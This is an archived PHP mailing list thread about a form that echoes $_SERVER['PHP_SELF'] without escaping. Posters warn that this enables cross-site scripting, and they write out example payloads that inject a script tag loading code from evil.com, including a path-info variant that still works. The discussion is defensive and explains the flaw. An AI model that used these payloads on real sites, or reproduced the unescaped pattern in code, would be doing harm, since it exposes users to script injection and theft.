On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban <dmi...@ruban.biz> wrote: > Hi Jochem, > > Jochem Maas wrote: >> >> Op 3/10/10 6:23 PM, Joseph Thayne schreef: >>> >>> Looks to me like you are closing your form before you put anything in >>> it. Therefore, the loan_amount is not set making the value 0. Follow >>> the math, and you are dividing by 1-1. >>> >>> Change this line: >>> >>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form> >>> >>> to: >>> >>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> >> >> this is a XSS waiting to happen. I can put something like the following in >> the request uri: >> >> index.php?" onsubmit="evil()"><script >> src="http://www.evil.com/evi.js";></script> >> > Apparently it's not going to work. PHP_SELF does not include query string. > So it is safe to use it this way. > > Regards, > Dmitry
No, it is not safe... This won't work: index.php?" onsubmit="evil()"><script src="http://www.evil.com/evi.js";></script> But this will: index.php/" onsubmit="evil()"><script src="http://www.evil.com/evi.js";></script> -- Daniel Egeberg -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
